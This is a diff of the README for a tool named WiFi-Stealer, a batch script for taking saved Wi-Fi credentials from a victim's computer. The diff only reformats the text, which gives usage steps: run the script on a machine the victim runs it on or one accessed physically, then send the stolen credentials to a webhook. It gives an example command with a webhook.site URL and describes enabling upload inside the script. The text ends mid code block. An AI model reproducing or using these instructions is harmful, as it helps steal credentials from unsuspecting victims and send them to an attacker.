Psi505/WiFi-Stealer/README.md

 ### Running the program on the target machine
 Usually when running the program of a remote machine (program downloaded and executed by the victim) or a machine that you gained phisical access to, you need a way to retrieve the credentials.
 This is how you do it:

-- Specify the webhook as an argument
-Simply run the program and pass the URL of your webhook as an argument:
+- **Specify the webhook as an argument**: Simply run the program and pass the URL of your webhook as an argument:

 ```batch
 > WiFi-Stealer.bat --upload "https://webhook.site/#!/87258b74-93c5-4792-8175-df08c3ffee20"
 ```

-- Store the webhook inside the program
-If you can't run the program from the command prompt or to avoid typing the url, ensure to save your webhook's URL in the variable `webhook` within the program.
+- **Store the webhook inside the program**: If you can't run the program from the command prompt or to avoid typing the url, ensure to save your webhook's URL in the variable `webhook` within the program.
 Another important step is to change the value of the `upload` variable from `0` to `1`.
 Once the program is executed, you will receive the credentials.

 ```batch
 set upload=0